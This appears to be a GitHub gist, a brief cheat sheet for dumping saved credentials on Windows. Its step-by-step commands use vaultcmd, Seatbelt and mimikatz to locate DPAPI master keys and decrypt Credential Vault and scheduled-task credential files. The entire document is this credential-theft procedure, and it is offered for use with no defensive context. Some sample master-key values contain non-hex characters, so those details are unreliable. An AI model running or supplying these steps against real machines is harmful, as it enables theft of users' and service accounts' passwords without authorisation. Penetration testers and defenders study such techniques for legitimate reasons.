Skip to content

Instantly share code, notes, and snippets.

@alexdhital

alexdhital/Dump Windows Credential Vault and Scheduled Tasks Credentials.md

Last active September 20, 2024 10:37
Show Gist options
  • Save alexdhital/156077d873ea06a7a3058e56747f2dd6 to your computer and use it in GitHub Desktop.
Save alexdhital/156077d873ea06a7a3058e56747f2dd6 to your computer and use it in GitHub Desktop.
Download ZIP
Dump Credentials From Windows Credential Vault and Scheduled Tasks
Raw
Dump Windows Credential Vault and Scheduled Tasks Credentials.md

Credential vault

Works only when running as same user whose credentials we are dumping

List vaults

C:\Users\Alex\Desktop> vaultcmd /list

List available credentials in vault

C:\Users\Alex\Desktop> vaultcmd /listcreds:"<vault-name>" /all

List where the actual encrypted credentials are stored (keep note of FileName and GUID of masterkey)

The credentials are usually stored in C:\Users\<username>\AppData\Local\Microsoft\Credentials\. We will also need the guid of the master-key used to encrypt these credentials so we can use seatbelt to get the guid of the master key.

C:\Users\Alex\Desktop> C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles

To find masterkey which is used to encrypt the credential files

Here, find the masterkey using the guid extracted from above command. The GUID will be in between {}. Now extract the masterkey.

C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi

Decrypt the credential using the masterkey

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\8C33AC82H3F5DCEAB186B3B2E5B1AC7F /masterkey:9e26495a4bd40a61d5eb6e528d55ef598a398d530ecc2f5387e07605eefc6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19cd15

Scheduled Tasks

List scheduled task credentials

C:\Users\Alex\Desktop> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

For each credential get the guid of MasterKey

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65

Extract the master key

C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi

Decrypt the credential file using the master key

C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65 /masterkey:32530ddd04093232f87ds5345b3bb4b758b7382ed6db73806f86238f6c3527d830f67210139579f26b0c0f039cd9a53b16b4af0a3f411edfagc593a541f8d0e2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment